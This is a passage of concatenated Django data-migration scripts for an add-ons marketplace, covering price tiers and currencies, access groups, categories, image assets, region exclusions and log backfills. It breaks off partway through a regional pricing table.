import elasticutils
from addons.search import setup_mapping
def columns():
    """Return the field names currently mapped for 'addons' in the default
    ES index."""
    index = settings.ES_INDEXES['default']
    mapping = elasticutils.get_es().get_mapping('addons', index)
    return mapping['addons']['properties'].keys()
def run():
if 'name_finnish' not in columns():
print 'ok'
setup_mapping()
else:
print 'skippint'
assert 'name_finnish' in columns()
########NEW FILE########
__FILENAME__ = 269-one-cent-price
from decimal import Decimal
from django.conf import settings
from market.models import Price
def run():
    """On APP_PREVIEW servers only: wipe all tiers and create a single
    one-cent 'Tier 1'."""
    if settings.APP_PREVIEW:
        Price.objects.all().delete()
        Price.objects.create(name='Tier 1', price=Decimal('0.01'))
########NEW FILE########
__FILENAME__ = 297-add-android
from applications.models import Application
def run():
    # Create the Android application row (id 61) with its GUID.
    Application.objects.create(id=61,
        guid='{aa3c5121-dab2-40e2-81ca-7ea25febc110}')
########NEW FILE########
__FILENAME__ = 335-perms-locales
from django.conf import settings
from access.models import Group, GroupUser
# Every supported locale except en-US, sorted for stable pk assignment.
LANGS = sorted(list(
    set(settings.AMO_LANGUAGES + settings.HIDDEN_LANGUAGES) -
    set(['en-US'])))
def run():
    """Create per-locale localizer groups (pks 50006+) and migrate members
    from the old groups (pk < 50000) into them."""
    Group.objects.create(pk=50006, name='Senior Localizers',
                         rules='Locales:Edit')
    for idx, locale in enumerate(LANGS):
        pk = 50007 + idx
        name = '%s Localizers' % locale
        rules = 'Locale.%s:Edit,L10nTools:View' % locale
        group = Group.objects.create(pk=pk, name=name, rules=rules)
        print 'New group created: (%d) %s' % (pk, name)
        try:
            old_group = Group.objects.get(pk__lt=50000, name=name)
        except Group.DoesNotExist:
            print 'Old group not found: %s' % name
            continue
        # Rename old groups so they are distinguisable.
        old_group.update(name=old_group.name + ' (OLD)')
        # Migrate users to new group.
        cnt = 0
        for user in old_group.users.all():
            cnt += 1
            GroupUser.objects.create(group=group, user=user)
        print 'Migrated %d users to new group (%s)' % (cnt, name)
########NEW FILE########
__FILENAME__ = 356-add-currencies
from decimal import Decimal
from market.models import Price, PriceCurrency
currencies = {
'CAD': {
'Tier 1': '0.99',
'Tier 2': '1.99',
'Tier 3': '2.99',
'Tier 4': '3.99',
'Tier 5': '4.99',
'Tier 6': '5.99',
'Tier 7': '6.99',
'Tier 8': '7.99',
'Tier 9': '8.99',
'Tier 10': '9.99',
'Tier 11': '10.99',
'Tier 12': '11.99',
'Tier 13': '12.99',
'Tier 14': '13.99',
'Tier 15': '14.99',
'Tier 16': '15.99',
'Tier 17': '16.99',
'Tier 18': '17.99',
'Tier 19': '18.99',
'Tier 20': '19.99',
'Tier 21': '20.99',
'Tier 22': '21.99',
'Tier 23': '22.99',
'Tier 24': '23.99',
'Tier 25': '24.99',
'Tier 26': '29.99',
'Tier 27': '34.99',
'Tier 28': '39.99',
'Tier 29': '44.99',
'Tier 30': '49.99',
},
'EUR': {
'Tier 1': '0.79',
'Tier 2': '1.49',
'Tier 3': '2.29',
'Tier 4': '2.99',
'Tier 5': '3.79',
'Tier 6': '4.49',
'Tier 7': '5.29',
'Tier 8': '5.99',
'Tier 9': '6.79',
'Tier 10': '7.49',
'Tier 11': '8.29',
'Tier 12': '8.99',
'Tier 13': '9.79',
'Tier 14': '10.49',
'Tier 15': '11.29',
'Tier 16': '11.99',
'Tier 17': '12.79',
'Tier 18': '13.49',
'Tier 19': '14.29',
'Tier 20': '14.99',
'Tier 21': '15.79',
'Tier 22': '16.49',
'Tier 23': '17.29',
'Tier 24': '17.99',
'Tier 25': '18.79',
'Tier 26': '22.29',
'Tier 27': '26.29',
'Tier 28': '29.99',
'Tier 29': '33.79',
'Tier 30': '37.29',
},
'GBP': {
'Tier 1': '0.69',
'Tier 2': '1.29',
'Tier 3': '1.99',
'Tier 4': '2.49',
'Tier 5': '3.29',
'Tier 6': '3.99',
'Tier 7': '4.49',
'Tier 8': '5.29',
'Tier 9': '5.99',
'Tier 10': '6.49',
'Tier 11': '6.99',
'Tier 12': '7.99',
'Tier 13': '8.29',
'Tier 14': '8.99',
'Tier 15': '9.49',
'Tier 16': '10.29',
'Tier 17': '10.99',
'Tier 18': '11.49',
'Tier 19': '11.99',
'Tier 20': '12.99',
'Tier 21': '13.49',
'Tier 22': '13.99',
'Tier 23': '14.99',
'Tier 24': '15.49',
'Tier 25': '15.99',
'Tier 26': '18.99',
'Tier 27': '22.49',
'Tier 28': '25.49',
'Tier 29': '28.49',
'Tier 30': '31.99',
},
'JPY': {
'Tier 1': '80',
'Tier 2': '160',
'Tier 3': '240',
'Tier 4': '320',
'Tier 5': '400',
'Tier 6': '460',
'Tier 7': '540',
'Tier 8': '620',
'Tier 9': '700',
'Tier 10': '780',
'Tier 11': '860',
'Tier 12': '940',
'Tier 13': '1000',
'Tier 14': '1080',
'Tier 15': '1160',
'Tier 16': '1240',
'Tier 17': '1320',
'Tier 18': '1400',
'Tier 19': '1480',
'Tier 20': '1560',
'Tier 21': '1620',
'Tier 22': '1700',
'Tier 23': '1780',
'Tier 24': '1860',
'Tier 25': '1940',
'Tier 26': '2320',
'Tier 27': '2700',
'Tier 28': '3100',
'Tier 29': '3480',
'Tier 30': '3860',
}
}
def run():
    """Add per-currency prices for each existing tier in the `currencies`
    table above; tiers missing from the DB are reported and skipped."""
    for currency, prices in currencies.items():
        for k, v in prices.items():
            try:
                tier = Price.objects.get(name__localized_string=k)
                PriceCurrency.objects.create(tier=tier,
                                             price=Decimal(v),
                                             currency=currency)
            except Price.DoesNotExist:
                print 'Skipping creating: %s, %s for %s' % (k, v, currency)
########NEW FILE########
__FILENAME__ = 366-tier-0
from decimal import Decimal
from market.models import Price, PriceCurrency
def run():
    """Create a free 'Tier 0' with zero-amount rows for each currency."""
    zero = Decimal('0')
    tier = Price.objects.create(name='Tier 0', price=zero, active=True)
    for cur in ('CAD', 'EUR', 'GBP', 'JPY'):
        PriceCurrency.objects.create(tier=tier, currency=cur, price=zero)
########NEW FILE########
__FILENAME__ = 376-mkt-featured-collections
# Migration removed because it depends on models which have been removed
def run():
    # Intentional no-op: the models this migration touched no longer exist.
    return False
########NEW FILE########
__FILENAME__ = 379-mkt-featured-rename
# Removed this migration because it depends on models that have been removed
def run():
    """No-op: depends on models that no longer exist."""
    return False
########NEW FILE########
__FILENAME__ = 417-migrate-logs
from django.db import connection, transaction
def run():
    """Copy marketplace activity-log rows into the marketplace-specific
    tables (log_activity_mkt / log_activity_app_mkt) using raw SQL."""
    cursor = connection.cursor()
    cursor.execute('select activity_log_id from log_activity_app;')
    ids = [r[0] for r in cursor.fetchall()]
    if not ids:
        # Nothing to migrate.
        return
    # Rows are copied wholesale (primary keys included), so FK checks
    # must be disabled for the duration of the inserts.
    cursor.execute('set foreign_key_checks = 0')
    cursor.execute('insert into log_activity_mkt '
                   'select * from log_activity where id IN %(ids)s;',
                   {'ids':ids})
    cursor.execute('insert into log_activity_app_mkt '
                   'select id, created, modified, addon_id, activity_log_id '
                   'from log_activity_app;')
    cursor.execute('set foreign_key_checks = 1')
    # Commit immediately unless an enclosing transaction is in control.
    transaction.commit_unless_managed()
########NEW FILE########
__FILENAME__ = 424-restricted-group
from access.models import Group
def run():
    """Create the 'Restricted Users' access group with its UGC rule."""
    group_kwargs = {'name': 'Restricted Users', 'rules': 'Restricted:UGC'}
    Group.objects.create(**group_kwargs)
########NEW FILE########
__FILENAME__ = 427-update-webapp-domain
from mkt.webapps.models import Webapp
def run():
    """Backfill each webapp's app_domain from its manifest URL."""
    for webapp in Webapp.objects.all():
        manifest = webapp.manifest_url
        if manifest:
            webapp.update(app_domain=Webapp.domain_from_url(manifest))
########NEW FILE########
__FILENAME__ = 441-mkt-contribution-tiers
import amo
from market.models import Price
from stats.models import Contribution
def run():
    """
    Attach price tier to existing USD contributions for marketplace.
    """
    contribs = (Contribution.objects
                .filter(price_tier__isnull=True,
                        addon__type=amo.ADDON_WEBAPP))
    for contrib in contribs:
        try:
            # abs(): presumably amounts can be negative (refunds) while
            # tier prices are positive — TODO confirm.
            contrib.update(
                price_tier=Price.objects.get(price=abs(contrib.amount))
            )
        except (AttributeError, Price.DoesNotExist) as e:
            # Best-effort: log and keep going on missing amount/tier.
            print str(e)
            continue
########NEW FILE########
__FILENAME__ = 453-exclude-games-in-brazil
import mkt
from mkt.webapps.models import AddonExcludedRegion as AER, Webapp
def run():
    """Exclude Games in Brazil."""
    games = Webapp.category('games')
    if not games:
        return
    for app in Webapp.objects.filter(categories=games.id):
        AER.objects.get_or_create(addon=app, region=mkt.regions.BR.id)
########NEW FILE########
__FILENAME__ = 465-generate-image-assets
from amo.utils import chunked
from mkt.developers.tasks import generate_image_assets
from mkt.webapps.models import Webapp
def run():
    """Queue image-asset generation for every webapp, best-effort."""
    for batch in chunked(Webapp.objects.all(), 50):
        for webapp in batch:
            try:
                generate_image_assets.delay(webapp)
            except Exception:
                # Best-effort backfill: one bad app must not stop the rest.
                pass
########NEW FILE########
__FILENAME__ = 468-delete-dupe-assets
from amo.utils import chunked
from mkt.constants import APP_IMAGE_SIZES
from mkt.webapps.models import ImageAsset, Webapp
# Slugs of every supported app image-asset size.
SIZE_SLUGS = [size['slug'] for size in APP_IMAGE_SIZES]
def run():
    """Delete duplicate image assets, keeping the first per (app, slug)."""
    for chunk in chunked(Webapp.objects.all(), 50):
        for app in chunk:
            for slug in SIZE_SLUGS:
                assets = ImageAsset.objects.filter(addon=app, slug=slug)
                # Keep the first row; everything after it is a duplicate.
                for asset in assets[1:]:
                    asset.delete()
########NEW FILE########
__FILENAME__ = 479-regenerate-image-assets
from amo.utils import chunked
from mkt.developers.tasks import generate_image_assets
from mkt.webapps.models import Webapp
def run():
    """Re-queue image-asset generation for all webapps."""
    for batch in chunked(Webapp.objects.all(), 50):
        for webapp in batch:
            generate_image_assets.delay(webapp)
########NEW FILE########
__FILENAME__ = 482-generate-featured-image-assets
from amo.utils import chunked
from mkt.developers.tasks import generate_image_assets
from mkt.webapps.models import Webapp
def run():
    """Generate featured tiles."""
    for chunk in chunked(Webapp.objects.all(), 50):
        for app in chunk:
            generate_image_assets.delay(app, slug='featured_tile')
            # Printed when the task is enqueued, not when it completes.
            print u'Generated feature tile for app %d' % app.id
########NEW FILE########
__FILENAME__ = 488-reindex-ratings
#!/usr/bin/env python
from celeryutils import task
from amo.utils import chunked
from amo.decorators import write
from addons.models import Addon
@task
@write
def reindex_reviews(addon_id, **kw):
    """Re-save one review of the add-on so post-save signals refresh the
    add-on's bayesian rating in ES."""
    try:
        # Emit post-save signals so ES gets the correct bayesian ratings.
        # One review is enough to fire off the tasks.
        Addon.objects.get(id=addon_id).reviews[0].save()
    except IndexError:
        # It's possible that `total_reviews` was wrong.
        print 'No reviews found for %s' % addon_id
def run():
    """Fix app ratings in ES (bug 787162)."""
    addon_ids = (Addon.objects.filter(total_reviews__gt=0)
                 .values_list('id', flat=True))
    for batch in chunked(addon_ids, 50):
        for pk in batch:
            reindex_reviews.delay(pk)
########NEW FILE########
__FILENAME__ = 497-move-blplugin-app-to-blapp
from apps.blocklist.models import BlocklistApp, BlocklistPlugin
def run():
    """Copy app-based plugin blocks into BlocklistApp rows.

    Only blocked plugins with guid, min and max all set are app-based
    blocks; otherwise min/max refer to the plugin's own version range.
    """
    candidates = (BlocklistPlugin.objects.exclude(min='').exclude(min=None)
                  .exclude(max='').exclude(max=None)
                  .exclude(guid='').exclude(guid=None))
    for plugin in candidates:
        if not (plugin.guid and plugin.min and plugin.max):
            continue
        BlocklistApp.objects.create(blplugin=plugin, guid=plugin.guid,
                                    min=plugin.min, max=plugin.max)
        # Null out the fields so the migration can be resumed if
        # interrupted, and so the remaining min/max are never mistaken
        # for plugin version bounds once the guid column is dropped.
        plugin.guid = None
        plugin.min = None
        plugin.max = None
        plugin.save()
########NEW FILE########
__FILENAME__ = 503-gaia-device-type
#!/usr/bin/env python
from celeryutils import task
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Count
import amo
from addons.models import AddonDeviceType as ADT
from amo.decorators import write
from amo.utils import chunked
@task
@write
def _task(**kw):
    """Dedupe AddonDeviceType rows, drop orphans, then clone every
    mobile row as a Firefox OS (Gaia) row."""
    # Remove any dupes. `UNIQUE` constraint introduced in migration 504.
    dupes = (ADT.objects.values_list('addon', 'device_type')
             .annotate(c=Count('id')).filter(c__gt=1))
    for addon, device_type, total in dupes:
        devices = ADT.objects.filter(addon_id=addon, device_type=device_type)
        # Delete all but one of the `total` duplicate rows.
        for d in devices[:total - 1]:
            d.delete()
    # Remove stale device types.
    devices = ADT.objects.all()
    for chunk in chunked(devices, 50):
        for device in chunk:
            try:
                device.addon
            except ObjectDoesNotExist:
                # Row points at a deleted add-on; drop it.
                device.delete()
    # `DEVICE_MOBILE` -> `DEVICE_MOBILE` and `DEVICE_GAIA`.
    devices = ADT.objects.filter(device_type=amo.DEVICE_MOBILE.id)
    for chunk in chunked(devices, 50):
        for device in chunk:
            if amo.DEVICE_GAIA in device.addon.device_types:
                continue
            # Clearing the pk makes save() INSERT a new (Gaia) row
            # instead of updating the existing mobile one.
            device.id = None
            device.device_type = amo.DEVICE_GAIA.id
            device.save()
            device.addon.save()
def run():
    """Mark mobile-compatible apps as compatible for Firefox OS as well."""
    # All the work happens in the celery task above (decorated @write).
    _task()
########NEW FILE########
__FILENAME__ = 520-delete-regions
#!/usr/bin/env python
from celeryutils import task
from mkt.webapps.models import AddonExcludedRegion
from amo.decorators import write
@task
@write
def _task(**kw):
    """Delete AddonExcludedRegion rows for retired regions.

    Region ids: 3 - Canada, 5 - Australia, 6 - New Zealand.
    """
    # delete() is called purely for its side effect; the previous code
    # bound the (useless) return value to an unused local.
    AddonExcludedRegion.objects.filter(region__in=[3, 5, 6]).delete()
def run():
    """Delete region exclusions for Canada (3), Australia (5) and
    New Zealand (6) via the `_task` above.

    NOTE(review): the previous docstring ("Mark mobile-compatible apps
    as compatible for Firefox OS...") was copy-pasted from migration 503
    and did not describe this script.
    """
    _task()
########NEW FILE########
__FILENAME__ = 532-unleash-payments-in-usa
import amo
import mkt
from mkt.webapps.models import AddonExcludedRegion
def run():
    """Unleash payments in USA."""
    paid_exclusions = (AddonExcludedRegion.objects
                       .exclude(addon__premium_type=amo.ADDON_FREE)
                       .filter(region=mkt.regions.US.id))
    paid_exclusions.delete()
########NEW FILE########
__FILENAME__ = 557-cleanup-upsell
from addons.models import AddonUpsell
def run():
    """Run cleanup() on every AddonUpsell row."""
    # Materialize first so cleanup() can delete rows while we iterate.
    upsells = list(AddonUpsell.objects.all())
    for upsell in upsells:
        upsell.cleanup()
########NEW FILE########
__FILENAME__ = 566-add-tiers
from decimal import Decimal
from django.db import transaction
from market.models import Price
@transaction.commit_on_success
def run():
    """Create the 0.10 / 0.25 / 0.50 / 12.49 price tiers if missing."""
    print 'Adding in new tiers'
    for tier in ['0.10', '0.25', '0.50', '12.49']:
        exists = Price.objects.no_cache().filter(price=Decimal(tier)).exists()
        if exists:
            print 'Tier already exists, skipping: %s' % tier
            continue
        # All new rows get the placeholder name 'Tier 0'; the 568
        # migration renames tiers by ascending price.
        print 'Created tier: %s' % tier
        Price.objects.create(name='Tier 0', price=Decimal(tier),
                             active=True)
########NEW FILE########
__FILENAME__ = 568-rename-tiers
from django.db import transaction
from market.models import Price
@transaction.commit_on_success
def run():
    """Rename every active tier to 'Tier <n>' in ascending price order."""
    print 'Renaming tiers'
    for k, tier in enumerate(Price.objects.no_cache().filter(active=True)
                            .order_by('price')):
        new = 'Tier %s' % k
        print 'Renaming %s to %s' % (tier.name, new)
        tier.name = new
        tier.save()
########NEW FILE########
__FILENAME__ = 575-reorganize-cats
import amo
from addons.models import Category
def run():
    """
    We reorganized our categories:
    https://bugzilla.mozilla.org/show_bug.cgi?id=854499
    Usage::
        python -B manage.py runscript migrations.575-reorganize-cats
    """
    all_cats = Category.objects.filter(type=amo.ADDON_WEBAPP)
    # (1) "Entertainment & Sports" becomes "Entertainment" and "Sports."
    try:
        # filter()[0] rather than get(): take the first match, raising
        # IndexError (not DoesNotExist) when the slug is absent.
        entertainment = all_cats.filter(slug='entertainment-sports')[0]
    except IndexError:
        print 'Could not find Category with slug="entertainment-sports"'
    else:
        # (a) Change name of the category to "Entertainment."
        entertainment.name = 'Entertainment'
        entertainment.slug = 'entertainment'
        entertainment.save()
        print 'Renamed "Entertainment & Sports" to "Entertainment"'
        # (b) Create a new category called "Sports."
        Category.objects.create(type=amo.ADDON_WEBAPP, slug='sports',
                                name='Sports')
        print 'Created "Sports"'
    # --
    # (2) "Music & Audio" becomes "Music".
    try:
        music = all_cats.filter(slug='music')[0]
    except IndexError:
        print 'Could not find Category with slug="music"'
    else:
        music.name = 'Music'
        music.save()
        print 'Renamed "Music & Audio" to "Music"'
    # --
    # (3) "Social & Communication" becomes "Social".
    try:
        social = all_cats.filter(slug='social')[0]
    except IndexError:
        print 'Could not find Category with slug="social"'
    else:
        social.name = 'Social'
        social.save()
        print 'Renamed "Social & Communication" to "Social"'
    # --
    # (4) "Books & Reference" becomes "Books" and "Reference."
    try:
        books = all_cats.filter(slug='books-reference')[0]
    except IndexError:
        print 'Could not find Category with slug="books-reference"'
    else:
        # (a) Change name of the category to "Books.""
        books.name = 'Books'
        books.slug = 'books'
        books.save()
        print 'Renamed "Books & Reference" to "Books"'
        # (b) Create a new category called "Reference."
        Category.objects.create(type=amo.ADDON_WEBAPP, slug='reference',
                                name='Reference')
        print 'Created "Reference"'
    # --
    # (5) "Photos & Media" becomes "Photo & Video."
    try:
        photos = all_cats.filter(slug='photos-media')[0]
    except IndexError:
        print 'Could not find Category with slug="photos-media"'
    else:
        photos.name = 'Photo & Video'
        photos.slug = 'photo-video'
        photos.save()
        print 'Renamed "Photos & Media" to "Photo & Video"'
    # --
    # (6) Add "Maps & Navigation."
    Category.objects.create(type=amo.ADDON_WEBAPP, slug='maps-navigation',
                            name='Maps & Navigation')
    print 'Created "Maps & Navigation"'
########NEW FILE########
__FILENAME__ = 578-migrate-remora-admin-events
from datetime import datetime
from itertools import chain
import amo
from access.models import Group
from devhub.models import ActivityLog
from editors.models import EventLog
from users.models import UserProfile
# Are there other group changes we care about here?
# All of the old group IDs aside from Admins seem to have been deleted.
# Maps old remora group ids to new Group names; run() replaces the
# values with the resolved Group objects in place.
group_map = {
    1: 'Admins',
    2: 'Add-on Reviewers'
}
def run():
    """Replay remora-era admin group add/remove events into ActivityLog,
    then fabricate GROUP_USER_ADDED entries for editors added while
    logging was broken."""
    new_groups = Group.objects.filter(name__in=group_map.values())
    new_groups = dict((g.name, g) for g in new_groups)
    # Resolve the old ids in group_map to the actual Group objects.
    for id, name in group_map.items():
        group_map[id] = new_groups[name]
    items = (EventLog.objects.values_list('action', 'user', 'added', 'removed',
                                          'changed_id', 'created')
             .filter(type='admin',
                     action__in=('group_addmember',
                                 'group_removemember'),
                     changed_id__in=group_map.keys())
             .order_by('created'))
    # `added`/`removed` carry the affected user's id as a string; the
    # code assumes at most one of them is set (`i[2] or i[3]`).
    user_ids = set(chain(*[(i[1], int(i[2] or i[3]))
                           for i in items
                           if (i[2] or i[3] or '').isdigit()]))
    users = dict((u.id, u)
                 for u in UserProfile.objects.filter(id__in=user_ids))
    for action, admin, added, removed, group_id, created in items:
        if action == 'group_addmember':
            user_id, action = added, amo.LOG.GROUP_USER_ADDED
        else:
            user_id, action = removed, amo.LOG.GROUP_USER_REMOVED
        if not user_id.isdigit():
            continue
        user_id = int(user_id)
        # Preserve the original event timestamp on the new log entry.
        kw = {'created': created}
        if admin in users:
            kw['user'] = users[admin]
        if user_id in users:
            amo.log(action, group_map[group_id], users[user_id], **kw)
    # Fudge logs for editors who were added while logging was broken.
    created = datetime(2013, 3, 14, 3, 14, 15, 926535)
    user = group_map[1].users.all()[0]
    group = group_map[2]
    logs = (ActivityLog.objects.for_group(group)
            .filter(action=amo.LOG.GROUP_USER_ADDED.id))
    # Editors currently in the group that have no ADDED log entry yet.
    editors = (UserProfile.objects.filter(groups=group)
               .exclude(id__in=[l.arguments[1].id for l in logs]))
    for editor in editors:
        amo.log(amo.LOG.GROUP_USER_ADDED, group, editor, user=user,
                created=created)
########NEW FILE########
__FILENAME__ = 581-rename-tiers
from decimal import Decimal
from market.models import Price
# "<new name> <USD amount>" pairs, one per line; run() renames the Price
# row matching each USD amount to the bare-number name.
tiers = """
0 0.00
1 0.10
5 0.25
7 0.50
10 0.99
20 1.99
30 2.99
40 3.99
50 4.99
60 6.99
70 9.99
80 12.49
90 14.99
100 19.99
110 24.99
120 29.99
130 39.99
140 49.99
"""
def run():
    """Rename each Price tier to the name paired with its USD amount in
    the `tiers` table above; tiers with no matching price are skipped."""
    for tier in tiers.strip().split('\n'):
        if not tier.strip():
            continue
        name, amount = tier.strip().split(' ')
        try:
            tier = Price.objects.get(price=Decimal(amount))
        except Price.DoesNotExist:
            print 'Tier not found: %s' % amount
            continue
        tier.name = name
        tier.save()
        print 'Tier changed: %s to %s' % (amount, name)
########NEW FILE########
__FILENAME__ = 588-calc-persona-checksums
def run():
    """Intentionally does nothing (placeholder migration slot)."""
########NEW FILE########
__FILENAME__ = 590-theme-checksums-fix
def run():
    """Intentionally does nothing (placeholder migration slot)."""
########NEW FILE########
__FILENAME__ = 594-theme-checksums
def run():
    """Intentionally does nothing (placeholder migration slot)."""
########NEW FILE########
__FILENAME__ = 595-theme-checksums
def run():
    """Intentionally does nothing (placeholder migration slot)."""
########NEW FILE########
__FILENAME__ = 596-theme-checksums
#!/usr/bin/env python
from addons.models import Persona
from addons.tasks import calc_checksum
from amo.utils import chunked
def run():
    """Calculate checksums for all themes."""
    pending = Persona.objects.filter(checksum='').values_list('id', flat=True)
    for batch in chunked(pending, 1000):
        for pk in batch:
            calc_checksum.delay(pk)
########NEW FILE########
__FILENAME__ = 597-theme-description
#!/usr/bin/env python
from addons.models import Addon
import amo
def run():
    """
    Migrate summary to description field for a handful of themes after
    getpersonas migration.

    NOTE(review): intentionally disabled; a later migration (600) runs a
    variant of this work live.
    """
    # addons = Addon.objects.filter(type=amo.ADDON_PERSONA,
    # description__isnull=True, summary__isnull=False)
    # for addon in addons:
    # addon.description = addon.summary
    # addon.summary = ''
    # addon.save()
########NEW FILE########
__FILENAME__ = 599-backfill-app-features
#!/usr/bin/env python
from django.db.utils import IntegrityError
from versions.models import Version
from mkt.webapps.models import AppFeatures, Webapp
def run():
    """Ensure every version of every webapp (deleted ones included) has
    an AppFeatures row."""
    for app in Webapp.with_deleted.all():
        for ver in Version.with_deleted.filter(addon=app):
            try:
                # Accessing .features raises if no row exists yet.
                ver.features
            except AppFeatures.DoesNotExist:
                try:
                    AppFeatures.objects.create(version=ver)
                except IntegrityError as e:
                    # A row may already exist (e.g. created concurrently);
                    # log and move on.
                    print ('[Webapp:%s] IntegrityError while trying to create '
                           'AppFeatures for version %s: %s' % (app.id, ver.id,
                                                               e))
                except Exception as e:
                    print ('[Webapp:%s] Exception while trying to create '
                           'AppFeatures for version %s: %s' % (app.id, ver.id,
                                                               e))
########NEW FILE########
__FILENAME__ = 600-theme-description
#!/usr/bin/env python
from addons.models import Addon
import amo
def run():
    """
    Migrate summary to description field for a handful of themes after
    getpersonas migration.
    """
    themes_missing_description = Addon.objects.filter(
        type=amo.ADDON_PERSONA, description__isnull=True,
        summary__isnull=False)
    for theme in themes_missing_description:
        theme.description = theme.summary
        theme.save()
########NEW FILE########
__FILENAME__ = 607-reboot-price-currencies
from django.db import models
import amo
from market.models import Price
# Regional pricing table keyed by USD tier amount.  Each value maps a
# country code to its local currency, localized price, region id and
# (where present) an operator-billing flag; run() below rebuilds the
# price_currency table from it.
tiers = {
    '0.00': {'CO': {'currency': 'COP',
                    'price': '0.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '0.00',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '0.00',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '0.00',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '0.00',
                    'region': 10}},
    '0.10': {'CO': {'currency': 'COP',
                    'price': '210.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '0.10',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '0.49',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '0.10',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '0.10',
                    'region': 10}},
    '0.25': {'CO': {'currency': 'COP',
                    'price': '520.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '0.25',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '0.99',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '0.25',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '0.25',
                    'region': 10}},
    '0.50': {'CO': {'currency': 'COP',
                    'price': '1050.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '0.45',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '1.99',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '0.50',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '0.50',
                    'region': 10}},
    '0.99': {'CO': {'currency': 'COP',
                    'price': '2060.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '0.89',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '3.99',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '0.99',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '0.99',
                    'region': 10}},
    '1.99': {'CO': {'currency': 'COP',
                    'price': '4150.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '1.89',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '7.69',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '1.99',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '1.99',
                    'region': 10}},
    '12.49': {'CO': {'currency': 'COP',
                     'price': '26070.00',
                     'region': 9},
              'ES': {'currency': 'EUR',
                     'price': '11.59',
                     'region': 8},
              'PL': {'currency': 'PLN',
                     'operator': 1,
                     'price': '48.49',
                     'region': 11},
              'US': {'currency': 'USD',
                     'price': '12.49',
                     'region': 2},
              'VE': {'currency': 'USD',
                     'price': '12.49',
                     'region': 10}},
    '14.99': {'ES': {'currency': 'EUR',
                     'price': '14.19',
                     'region': 8},
              'US': {'currency': 'USD',
                     'price': '14.99',
                     'region': 2},
              'VE': {'currency': 'USD',
                     'price': '14.99',
                     'region': 10}},
    '19.99': {'ES': {'currency': 'EUR',
                     'price': '18.99',
                     'region': 8},
              'US': {'currency': 'USD',
                     'price': '19.99',
                     'region': 2},
              'VE': {'currency': 'USD',
                     'price': '19.99',
                     'region': 10}},
    '2.99': {'CO': {'currency': 'COP',
                    'price': '6240.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '2.79',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '11.59',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '2.99',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '2.99',
                    'region': 10}},
    '24.99': {'ES': {'currency': 'EUR',
                     'price': '23.59',
                     'region': 8},
              'US': {'currency': 'USD',
                     'price': '24.99',
                     'region': 2},
              'VE': {'currency': 'USD',
                     'price': '24.99',
                     'region': 10}},
    '29.99': {'CO': {'currency': 'COP',
                     'price': '62580.00',
                     'region': 9},
              'ES': {'currency': 'EUR',
                     'price': '28.39',
                     'region': 8},
              'US': {'currency': 'USD',
                     'price': '29.99',
                     'region': 2},
              'VE': {'currency': 'USD',
                     'price': '29.99',
                     'region': 10}},
    '3.99': {'CO': {'currency': 'COP',
                    'price': '8320.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '3.79',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '15.49',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '3.99',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '3.99',
                    'region': 10}},
    '39.99': {'CO': {'currency': 'COP',
                     'price': '83460.00',
                     'region': 9},
              'US': {'currency': 'USD',
                     'price': '39.99',
                     'region': 2},
              'VE': {'currency': 'USD',
                     'price': '39.99',
                     'region': 10}},
    '4.99': {'CO': {'currency': 'COP',
                    'price': '10420.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '4.69',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '19.49',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '4.99',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '4.99',
                    'region': 10}},
    '49.99': {'CO': {'currency': 'COP',
                     'price': '104320.00',
                     'region': 9},
              'US': {'currency': 'USD',
                     'price': '49.99',
                     'region': 2},
              'VE': {'currency': 'USD',
                     'price': '49.99',
                     'region': 10}},
    '6.99': {'CO': {'currency': 'COP',
                    'price': '14600.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '6.59',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '26.99',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '6.99',
                    'region': 2},
             'VE': {'currency': 'USD',
                    'price': '6.99',
                    'region': 10}},
    '9.99': {'CO': {'currency': 'COP',
                    'methods': [],
                    'price': '20840.00',
                    'region': 9},
             'ES': {'currency': 'EUR',
                    'price': '9.49',
                    'region': 8},
             'PL': {'currency': 'PLN',
                    'operator': 1,
                    'price': '38.79',
                    'region': 11},
             'US': {'currency': 'USD',
                    'price': '9.99',
                    'region': 2},
